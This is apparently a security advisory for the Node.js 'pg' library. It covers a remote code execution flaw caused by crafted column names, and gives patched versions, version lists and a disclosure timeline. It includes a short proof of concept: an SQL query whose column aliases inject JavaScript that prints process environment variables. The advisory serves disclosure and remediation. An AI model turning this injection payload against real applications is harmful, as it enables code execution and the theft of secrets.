pg

Remote Code Execution

Severity: high

Overview

Affected versions of pg contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.

There are two specific scenarios in which it is likely for an application to be vulnerable:

  1. The application executes unsafe, user-supplied sql which contains malicious column names.
  2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.

Proof of Concept

const { Client } = require('pg')
const client = new Client()
client.connect()

const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {
  client.end()
})

Remediation

  • Version 2.x.x: Update to version 2.11.2 or later.
  • Version 3.x.x: Update to version 3.6.4 or later.
  • Version 4.x.x: Update to version 4.5.7 or later.
  • Version 5.x.x: Update to version 5.2.1 or later.
  • Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )
  • Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )

Vulnerable versions

0.0.1
8 years ago
0.0.2
8 years ago
0.0.3
8 years ago
0.0.4
8 years ago
0.0.5
8 years ago
0.0.6
8 years ago
0.1.0
8 years ago
0.1.1
8 years ago
0.1.2
8 years ago
0.1.3
8 years ago
0.2.0
8 years ago
0.2.2
8 years ago
0.2.3
8 years ago
0.2.4
8 years ago
0.2.5
8 years ago
0.2.6
8 years ago
0.2.7
8 years ago
0.2.8
7 years ago
0.3.0
7 years ago
0.3.2
7 years ago
0.3.3
7 years ago
0.4.0
7 years ago
0.4.1
7 years ago
0.5.0
7 years ago
0.5.1
7 years ago
0.5.2
7 years ago
0.5.3
7 years ago
0.5.4
7 years ago
0.5.5
7 years ago
0.5.6
7 years ago
0.5.7
7 years ago
0.5.8
7 years ago
0.6.0
7 years ago
0.6.1
7 years ago
0.6.2
7 years ago
0.6.3
7 years ago
0.6.4
7 years ago
0.6.5
7 years ago
0.6.6
7 years ago
0.6.7
7 years ago
0.6.8
7 years ago
0.6.9
7 years ago
0.6.10
7 years ago
0.6.11
6 years ago
0.6.12
6 years ago
0.6.13
6 years ago
0.6.14
6 years ago
0.6.15
6 years ago
0.6.16
6 years ago
0.6.17
6 years ago
0.6.18
6 years ago
0.7.0
6 years ago
0.7.1
6 years ago
0.7.2
6 years ago
0.8.0
6 years ago
0.8.1
6 years ago
0.8.2
6 years ago
0.8.3
6 years ago
0.8.4
6 years ago
0.8.6
6 years ago
0.8.7
6 years ago
0.8.8
6 years ago
0.9.0
6 years ago
0.10.0
6 years ago
0.10.2
6 years ago
0.11.1
6 years ago
0.11.2
6 years ago
0.11.3
6 years ago
0.12.0
6 years ago
0.12.1
6 years ago
0.12.3
6 years ago
0.13.0
5 years ago
0.13.1
5 years ago
0.13.3
5 years ago
0.14.0
5 years ago
0.14.1
5 years ago
0.15.0
5 years ago
0.15.1
5 years ago
1.0.0
5 years ago
1.0.1
5 years ago
1.0.2
5 years ago
1.0.3
5 years ago
1.0.4
5 years ago
1.1.0
5 years ago
1.1.1
5 years ago
1.1.2
5 years ago
1.1.3
5 years ago
1.2.0
5 years ago
1.3.0
5 years ago
2.0.0
5 years ago
2.1.0
5 years ago
2.2.0
5 years ago
2.3.0
5 years ago
2.3.1
5 years ago
2.4.0
5 years ago
2.5.0
5 years ago
2.5.1
5 years ago
2.6.0
5 years ago
2.6.1
5 years ago
2.6.2
5 years ago
2.7.0
5 years ago
2.8.0
5 years ago
2.8.1
5 years ago
2.8.2
5 years ago
2.8.3
5 years ago
2.8.4
5 years ago
2.8.5
5 years ago
2.9.0
5 years ago
2.10.0
5 years ago
2.11.0
5 years ago
2.11.1
5 years ago
3.0.0
4 years ago
3.0.1
4 years ago
3.0.2
4 years ago
3.0.3
4 years ago
3.1.0
4 years ago
3.2.0
4 years ago
3.3.0
4 years ago
3.4.0
4 years ago
3.4.1
4 years ago
3.4.2
4 years ago
3.4.3
4 years ago
3.4.4
4 years ago
3.4.5
4 years ago
3.5.0
4 years ago
3.6.0
4 years ago
3.6.1
4 years ago
3.6.2
4 years ago
3.6.3
4 years ago
4.0.0
4 years ago
4.1.0
4 years ago
4.1.1
4 years ago
4.2.0
4 years ago
4.3.0
3 years ago
4.4.0
3 years ago
4.4.1
3 years ago
4.4.2
3 years ago
4.4.3
3 years ago
4.4.4
3 years ago
4.4.5
3 years ago
4.4.6
3 years ago
4.5.0
2 years ago
4.5.1
2 years ago
4.5.2
2 years ago
4.5.3
2 years ago
4.5.4
2 years ago
4.5.5
2 years ago
4.5.6
2 years ago
5.0.0
2 years ago
5.1.0
2 years ago
5.2.0
2 years ago
6.0.0
2 years ago
6.0.1
2 years ago
6.0.2
2 years ago
6.0.3
2 years ago
6.0.4
2 years ago
6.1.0
2 years ago
6.1.1
2 years ago
6.1.2
2 years ago
6.1.3
a year ago
6.1.4
a year ago
6.1.5
a year ago
6.2.2
a year ago
6.2.3
a year ago
6.2.4
a year ago
6.3.0
a year ago
6.3.1
a year ago
6.4.0
a year ago
6.4.1
a year ago
7.0.0
a year ago
7.0.1
a year ago
7.1.0
a year ago
7.1.1
a year ago

Unaffected versions

4.0.0-beta1
4 years ago
4.0.0-beta2
4 years ago
7.0.2
a year ago
2.11.2
a year ago
3.6.4
a year ago
4.5.7
a year ago
5.2.1
a year ago
6.0.5
a year ago
6.1.6
a year ago
6.2.5
a year ago
6.3.3
a year ago
6.4.2
a year ago
7.0.3
a year ago
7.1.2
a year ago
7.2.0
a year ago
7.3.0
a year ago
7.4.0
9 months ago
7.4.1
7 months ago
7.4.2
3 months ago
7.4.3
3 months ago

Advisory timeline

  1. Published

    Advisory published
    Aug 13th, 2017
  2. Reported

    Initial report by Sehrope Sarkuni
    Aug 13th, 2017